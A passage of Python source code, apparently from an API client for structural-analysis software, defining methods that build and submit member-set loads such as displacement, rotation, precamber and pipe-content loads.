mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def AxialDisplacement(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_X,
magnitude : float = 0.0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Set
load_direction (enum): Load Direction Enumeration
magnitude (float): Load Magnitude
comment (str, optional): Comments
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_AXIAL_DISPLACEMENT
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
clientObject.magnitude = magnitude
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def Precamber(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (enum): Load Parameters
load_over_total_length (bool): Load Over Total Lenth Option
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [magnitude]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZIODAL:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [magnitude_1, magnitude_2, magnitude_3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_PRECAMBER
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==1
except:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of the load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
if load_parameter[2] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if load_parameter[2] == True:
clientObject.distance_a_is_defined_as_relative = True
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_is_defined_as_relative = False
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3] == True:
clientObject.distance_b_is_defined_as_relative = True
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_is_defined_as_relative = False
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
elif load_distribution.name == "LOAD_DISTRIBUTION_VARYING":
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def InitialPrestress(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_X,
magnitude : float = 0.0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_direction (enum): Load Direction Enumeration
magnitude (float): Load Magnitude
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_INITIAL_PRESTRESS
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
clientObject.magnitude = magnitude
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def Displacement(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
load_over_total_length (bool): Load Over Total Length Option
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [magnitude]
for load_distrubition = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_1:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_a]
for load_distrubition = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_N:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_a, distance_b]
for load_distrubition = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2x2:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_c_is_defined_as_relative = False, distance_a, distance_b, distance_c]
for load_distrubition = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2:
load_parameter = [magnitude_1, magnitude_2, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_a, distance_b]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZIODAL:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [magnitude_1, magnitude_2, magnitude_3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_DISPLACEMENT
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==1
except:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_1:
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_CONCENTRATED_1. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[2]
else:
clientObject.distance_a_absolute = load_parameter[2]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_N:
try:
len(load_parameter)==5
except:
raise Exception("WARNING: Load parameter array length should be 5 for LOAD_DISTRIBUTION_CONCENTRATED_N. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
clientObject.distance_b_is_defined_as_relative = load_parameter[2]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[3]
else:
clientObject.distance_a_absolute = load_parameter[3]
if load_parameter[2]:
clientObject.distance_b_relative = load_parameter[4]
else:
clientObject.distance_b_absolute = load_parameter[4]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2x2:
try:
len(load_parameter)==7
except:
raise Exception("WARNING: Load parameter array length should be 7 for LOAD_DISTRIBUTION_CONCENTRATED_2x2. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
clientObject.distance_b_is_defined_as_relative = load_parameter[2]
clientObject.distance_c_is_defined_as_relative = load_parameter[3]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[2]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
if load_parameter[3]:
clientObject.distance_c_relative = load_parameter[6]
else:
clientObject.distance_c_absolute = load_parameter[6]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_2. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of the load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter)==6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter)==3
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def Rotation(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM,
load_direction = MemberSetLoadDirection.LOAD_DIRECTION_LOCAL_Z,
load_parameter = [],
load_over_total_length: bool= False,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_distribution (enum): Load Distribution Enumeration
load_direction (enum): Load Direction Enumeration
load_parameter (list): Load Parameters
load_over_total_length (bool): Load Over Total Length
comment (str, optional): Comment
params (dict, optional): Parameters
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
load_parameter = [magnitude]
for load_distrubition = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_1:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_a]
for load_distrubition = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_N:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_a, distance_b]
for load_distrubition = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2x2:
load_parameter = [magnitude, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_c_is_defined_as_relative = False, distance_a, distance_b, distance_c]
for load_distrubition = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2:
load_parameter = [magnitude_1, magnitude_2, distance_a_is_defined_as_relative = False, distance_b_is_defined_as_relative = False, distance_a, distance_b]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZIODAL:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
load_parameter = [magnitude_1, magnitude_2, distance_a_relative = False, distance_a_relative = False, a_distance, b_distance]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
load_parameter = [magnitude_1, magnitude_2, magnitude_3]
for load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
load_parameter = [[distance, delta_distance, magnitude], ...]
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_ROTATION
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = load_distribution.name
# Member Load Direction
clientObject.load_direction = load_direction.name
#Load Magnitude
if load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM:
try:
len(load_parameter)==1
except:
raise Exception("WARNING: Load parameter array length should be 1 for LOAD_DISTRIBUTION_UNIFORM. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_1:
try:
len(load_parameter) == 3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_CONCENTRATED_1. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[2]
else:
clientObject.distance_a_absolute = load_parameter[2]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_N:
try:
len(load_parameter) == 5
except:
raise Exception("WARNING: Load parameter array length should be 5 for LOAD_DISTRIBUTION_CONCENTRATED_N. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
clientObject.distance_b_is_defined_as_relative = load_parameter[2]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[3]
else:
clientObject.distance_a_absolute = load_parameter[3]
if load_parameter[2]:
clientObject.distance_b_relative = load_parameter[4]
else:
clientObject.distance_b_absolute = load_parameter[4]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2x2:
try:
len(load_parameter) == 7
except:
raise Exception("WARNING: Load parameter array length should be 7 for LOAD_DISTRIBUTION_CONCENTRATED_2x2. Kindly check list inputs completeness and correctness.")
clientObject.magnitude = load_parameter[0]
clientObject.distance_a_is_defined_as_relative = load_parameter[1]
clientObject.distance_b_is_defined_as_relative = load_parameter[2]
clientObject.distance_c_is_defined_as_relative = load_parameter[3]
if load_parameter[1]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[2]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
if load_parameter[3]:
clientObject.distance_c_relative = load_parameter[6]
else:
clientObject.distance_c_absolute = load_parameter[6]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_2:
try:
len(load_parameter) == 6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_CONCENTRATED_2. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_CONCENTRATED_VARYING:
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TRAPEZOIDAL:
try:
len(load_parameter) == 6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TRAPEZOIDAL. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
if type(load_over_total_length) == bool:
pass
else:
raise Exception("WARNING: Type of the load over total length should be bool. Kindly check inputs correctness.")
if load_over_total_length == False:
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
else:
clientObject.load_is_over_total_length = True
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_TAPERED:
try:
len(load_parameter) == 6
except:
raise Exception("WARNING: Load parameter array length should be 6 for LOAD_DISTRIBUTION_TAPERED. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.distance_a_is_defined_as_relative = load_parameter[2]
clientObject.distance_b_is_defined_as_relative = load_parameter[3]
if load_parameter[2]:
clientObject.distance_a_relative = load_parameter[4]
else:
clientObject.distance_a_absolute = load_parameter[4]
if load_parameter[3]:
clientObject.distance_b_relative = load_parameter[5]
else:
clientObject.distance_b_absolute = load_parameter[5]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_PARABOLIC:
try:
len(load_parameter) == 3
except:
raise Exception("WARNING: Load parameter array length should be 3 for LOAD_DISTRIBUTION_PARABOLIC. Kindly check list inputs completeness and correctness.")
clientObject.magnitude_1 = load_parameter[0]
clientObject.magnitude_2 = load_parameter[1]
clientObject.magnitude_3 = load_parameter[2]
elif load_distribution == MemberSetLoadDistribution.LOAD_DISTRIBUTION_VARYING:
try:
len(load_parameter[0])==3
except:
print("WARNING: MemberSetLoad no: %x, load case: %x - Wrong data input." % (no, load_case_no))
clientObject.varying_load_parameters = clientModel.factory.create('ns0:member_set_load.varying_load_parameters')
for i in range(len(load_parameter)):
mlvlp = clientModel.factory.create('ns0:member_set_load_varying_load_parameters')
mlvlp.no = i+1
mlvlp.distance = load_parameter[i][0]
mlvlp.delta_distance = load_parameter[i][1]
mlvlp.magnitude = load_parameter[i][2]
mlvlp.note = None
mlvlp.magnitude_t_c = 0.0
mlvlp.magnitude_delta_t = 0.0
mlvlp.magnitude_t_t = 0.0
mlvlp.magnitude_t_b = 0.0
clientObject.varying_load_parameters.member_set_load_varying_load_parameters.append(mlvlp)
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def PipeContentFull(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_direction_orientation = MemberSetLoadDirectionOrientation.LOAD_DIRECTION_FORWARD,
specific_weight : float = 0.0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_direction_orientation (enum): Load Direction Orientation Enumeration
specific_weight (float): Specific Weight
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
clientObject = clientModel.factory.create('ns0:member_set_load')
# Clears object atributes | Sets all atributes to None
clearAtributes(clientObject)
# Member Load No.
clientObject.no = no
# Load Case No.
clientObject.load_case = load_case_no
# Members No. (e.g. '5 6 7 12')
clientObject.member_sets = ConvertToDlString(member_sets)
# Member Load Type
load_type = MemberSetLoadType.LOAD_TYPE_PIPE_CONTENT_FULL
clientObject.load_type = load_type.name
# Member Load Distribution
clientObject.load_distribution = MemberSetLoadDistribution.LOAD_DISTRIBUTION_UNIFORM.name
# Member Load Direction
clientObject.load_direction = MemberSetLoadDirection.LOAD_DIRECTION_GLOBAL_Z_OR_USER_DEFINED_W_TRUE.name
#Member Load Orientation
clientObject.load_direction_orientation = load_direction_orientation.name
#Load Magnitude
clientObject.magnitude = specific_weight
# Comment
clientObject.comment = comment
# Adding optional parameters via dictionary
for key in params:
clientObject[key] = params[key]
# Add Load Member Load to client model
clientModel.service.set_member_set_load(load_case_no, clientObject)
def PipeContentPartial(self,
no: int = 1,
load_case_no: int = 1,
member_sets: str = '1',
load_direction_orientation = MemberSetLoadDirectionOrientation.LOAD_DIRECTION_FORWARD,
specific_weight : float = 0.0,
filling_height : float = 0.0,
comment: str = '',
params: dict = {}):
"""
Args:
no (int): Load Tag
load_case_no (int): Assigned Load Case
member_sets (str): Assigned Member Sets
load_direction_orientation (enum): Load Direction Orientation Enumeration
specific_weight (float): Specific Weight
filling_height (float): Filling Height
comment (str, optional): Comment
params (dict, optional): Parameters
"""
# Client model | Member Load
